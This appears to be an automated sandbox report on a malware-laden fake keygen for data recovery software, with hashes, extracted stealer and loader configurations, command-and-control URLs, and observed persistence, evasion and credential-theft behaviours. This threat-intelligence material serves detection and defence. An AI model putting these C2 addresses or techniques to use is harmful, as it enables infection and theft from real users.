Analysis
-
max time kernel
306s -
max time network
606s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
09-03-2021 14:26
Static task
static1
Behavioral task
behavioral1
Sample
Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
Resource
win7v20201028
General
-
Target
Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
-
Size
36.2MB
-
MD5
865c79976b6a4688551d5be9437163aa
-
SHA1
3aa11e3924100cbb8c92c2b396eedd93279ef878
-
SHA256
c59ce6ed0ebcfce3bc9c950ac699944405a6447e40a24697482cf64a0fb37e61
-
SHA512
f728bf7eb0411c41f416b437e908e7727f3b25f91bdd1715964be37e16dfc7638e58c2874d910ef2d8c10d0c46ff39aede8e662b35f0161cd426e4b46efadb33
Malware Config
Extracted
raccoon
51c194bfb6e404af0e5ff0b93b443907a6a845b1
-
url4cnc
https://telete.in/h_focus_1
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
e71b51d358b75fe1407b56bf2284e3fac50c860f
-
url4cnc
https://telete.in/oidmrwednesday
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/6580-777-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral2/memory/6580-780-0x00000000038C0000-0x000000000411D000-memory.dmp family_glupteba behavioral2/memory/6580-781-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/5916-306-0x0000000002160000-0x0000000002188000-memory.dmp family_redline behavioral2/memory/5916-312-0x0000000002320000-0x0000000002346000-memory.dmp family_redline behavioral2/memory/6400-350-0x0000000000400000-0x0000000000426000-memory.dmp family_redline behavioral2/memory/7952-645-0x0000000000400000-0x0000000000428000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Creates new service(s) 1 TTPs
-
Executes dropped EXE 64 IoCs
Processes:
KMSAuto Net.exewzt.datcertmgr.execertmgr.exebin.datAESDecoder.exebin_x64.datKMSSS.exebin_x64.datbin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exewzt.datcertmgr.execertmgr.exebin.datAESDecoder.exebin_x64.datKMSSS.exeSppPatcher_x64.datSppExtComObjPatcher.exeStellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exeStellar.Phoenix.Data.Recovery.crack.by.orion.exekeygen-pr.exekeygen-step-1.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exekeygen-pr.exekeygen-step-1.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exeaskinstall20.exeAD754B4D3FE2C4EE.exeAD754B4D3FE2C4EE.exeaskinstall20.exeInstall.exemultitimer.exemd2_2efs.exeInstall.exe1615303685562.exemultitimer.exemd2_2efs.exefile.exe1615303690109.exefile.exepid process 812 KMSAuto Net.exe 3588 wzt.dat 3300 certmgr.exe 2132 certmgr.exe 3912 bin.dat 2804 AESDecoder.exe 2976 bin_x64.dat 740 KMSSS.exe 1356 bin_x64.dat 212 bin_x64.dat 3524 FakeClient.exe 2064 bin_x64.dat 2184 FakeClient.exe 688 bin_x64.dat 3608 FakeClient.exe 1608 bin_x64.dat 2028 FakeClient.exe 488 bin_x64.dat 3828 FakeClient.exe 2524 bin_x64.dat 3864 FakeClient.exe 880 bin_x64.dat 2900 FakeClient.exe 2252 bin_x64.dat 2780 FakeClient.exe 3468 bin_x64.dat 992 FakeClient.exe 3160 wzt.dat 3176 certmgr.exe 3884 certmgr.exe 2028 bin.dat 904 AESDecoder.exe 1444 bin_x64.dat 720 KMSSS.exe 2184 SppPatcher_x64.dat 2780 SppExtComObjPatcher.exe 2968 Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe 3996 Stellar.Phoenix.Data.Recovery.crack.by.orion.exe 1124 keygen-pr.exe 2256 keygen-step-1.exe 2852 keygen-step-3.exe 3544 keygen-step-4.exe 2148 key.exe 2388 Setup.exe 3828 keygen-pr.exe 1320 keygen-step-1.exe 496 keygen-step-3.exe 644 keygen-step-4.exe 4344 key.exe 4352 Setup.exe 4616 askinstall20.exe 4812 AD754B4D3FE2C4EE.exe 4820 AD754B4D3FE2C4EE.exe 4860 askinstall20.exe 5044 Install.exe 4140 multitimer.exe 4160 md2_2efs.exe 4208 Install.exe 4404 1615303685562.exe 4060 multitimer.exe 4864 md2_2efs.exe 4592 file.exe 4604 1615303690109.exe 4856 file.exe -
Modifies Windows Firewall 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Sets service image path in registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 18 IoCs
Processes:
FakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeSppExtComObj.exeMsiExec.exepid process 3524 FakeClient.exe 3524 FakeClient.exe 2184 FakeClient.exe 3608 FakeClient.exe 2028 FakeClient.exe 2028 FakeClient.exe 3828 FakeClient.exe 3828 FakeClient.exe 3864 FakeClient.exe 3864 FakeClient.exe 2900 FakeClient.exe 2900 FakeClient.exe 2780 FakeClient.exe 2780 FakeClient.exe 992 FakeClient.exe 992 FakeClient.exe 2212 SppExtComObj.exe 4540 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
zznote.exemultitimer.exegcttt.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\oelwe312nqd = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\HADBYKVRG2\\multitimer.exe\" 1 3.1615300310.604786d6b013f" zznote.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\3wvbaemqplc = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\KCEIGP00AN\\multitimer.exe\" 1 3.1615300310.604786d6aa2e6" multitimer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" gcttt.exe -
Checks for any installed AV software in registry 1 TTPs 64 IoCs
Processes:
multitimer.exemultitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
md2_2efs.exemd2_2efs.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\A: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 26 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 644 ipinfo.io 738 ipinfo.io 892 ipinfo.io 135 ip-api.com 167 ipinfo.io 341 ipinfo.io 393 ipinfo.io 510 ip-api.com 897 ipinfo.io 935 ipinfo.io 597 ipinfo.io 535 checkip.amazonaws.com 697 ipinfo.io 741 ipinfo.io 90 api.ipify.org 164 ipinfo.io 306 checkip.amazonaws.com 359 ipinfo.io 361 ipinfo.io 946 ipinfo.io 677 checkip.amazonaws.com 178 ipinfo.io 299 ipinfo.io 309 ipinfo.io 352 ipinfo.io 356 ipinfo.io -
Maps connected drives based on registry 3 TTPs 4 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
multitimer.exemultitimer.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
Setup.exeAD754B4D3FE2C4EE.exeAD754B4D3FE2C4EE.exedescription ioc process File opened for modification \??\PhysicalDrive0 Setup.exe File opened for modification \??\PhysicalDrive0 AD754B4D3FE2C4EE.exe File opened for modification \??\PhysicalDrive0 AD754B4D3FE2C4EE.exe -
Drops file in System32 directory 4 IoCs
Processes:
cmd.execmd.exedescription ioc process File opened for modification C:\Windows\System32\SppExtComObjHook.dll cmd.exe File created C:\Windows\System32\SppExtComObjPatcher.exe cmd.exe File opened for modification C:\Windows\System32\SppExtComObjPatcher.exe cmd.exe File created C:\Windows\System32\SppExtComObjHook.dll cmd.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Setup.exepid process 2388 Setup.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
AD754B4D3FE2C4EE.exeD97A.tmp.exeE448.tmp.exedescription pid process target process PID 4812 set thread context of 2088 4812 AD754B4D3FE2C4EE.exe firefox.exe PID 4812 set thread context of 4612 4812 AD754B4D3FE2C4EE.exe firefox.exe PID 2896 set thread context of 2108 2896 D97A.tmp.exe D97A.tmp.exe PID 4812 set thread context of 1648 4812 AD754B4D3FE2C4EE.exe gcttt.exe PID 3988 set thread context of 5036 3988 E448.tmp.exe E448.tmp.exe -
Drops file in Windows directory 18 IoCs
Processes:
FakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exemultitimer.exeFakeClient.exeFakeClient.exemultitimer.exeFakeClient.exedescription ioc process File opened for modification C:\Windows\setupact.log FakeClient.exe File opened for modification C:\Windows\setupact.log FakeClient.exe File opened for modification C:\Windows\setuperr.log FakeClient.exe File opened for modification C:\Windows\setupact.log FakeClient.exe File opened for modification C:\Windows\setuperr.log FakeClient.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\setupact.log FakeClient.exe File opened for modification C:\Windows\setuperr.log FakeClient.exe File opened for modification C:\Windows\setuperr.log FakeClient.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\setuperr.log FakeClient.exe File opened for modification C:\Windows\setuperr.log FakeClient.exe File opened for modification C:\Windows\setuperr.log FakeClient.exe File opened for modification C:\Windows\setupact.log FakeClient.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\setupact.log FakeClient.exe File opened for modification C:\Windows\setupact.log FakeClient.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 6308 5196 WerFault.exe Setup.exe 7444 6808 WerFault.exe Setup.exe -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
AD754B4D3FE2C4EE.exeAD754B4D3FE2C4EE.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName AD754B4D3FE2C4EE.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 7512 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
multitimer.exemultitimer.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
NETSTAT.EXENETSTAT.EXEpid process 688 NETSTAT.EXE 1216 NETSTAT.EXE -
Kills process with taskkill 28 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeTASKKILL.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2200 taskkill.exe 2784 taskkill.exe 6260 taskkill.exe 11568 taskkill.exe 1836 taskkill.exe 2192 taskkill.exe 4120 taskkill.exe 3372 taskkill.exe 576 taskkill.exe 4200 taskkill.exe 7348 taskkill.exe 8384 taskkill.exe 9768 taskkill.exe 4032 taskkill.exe 3728 taskkill.exe 6724 taskkill.exe 3512 taskkill.exe 4024 taskkill.exe 3132 taskkill.exe 4020 taskkill.exe 7400 TASKKILL.exe 4756 taskkill.exe 7216 taskkill.exe 6964 taskkill.exe 5052 taskkill.exe 8768 taskkill.exe 3560 taskkill.exe 5828 taskkill.exe -
Modifies data under HKEY_USERS 13 IoCs
Processes:
SppExtComObj.exereg.exereg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588 SppExtComObj.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588\DiscoveredKeyManagementServiceIpAddress = "1.2.3.4" SppExtComObj.exe Key deleted \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f SppExtComObj.exe Key deleted \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663\85dd8b5f-eaa4-4af3-a628-cce9e77c9a03 reg.exe Key deleted \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663 reg.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588 SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT SppExtComObj.exe Key deleted \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588 reg.exe -
Modifies registry class 2 IoCs
Processes:
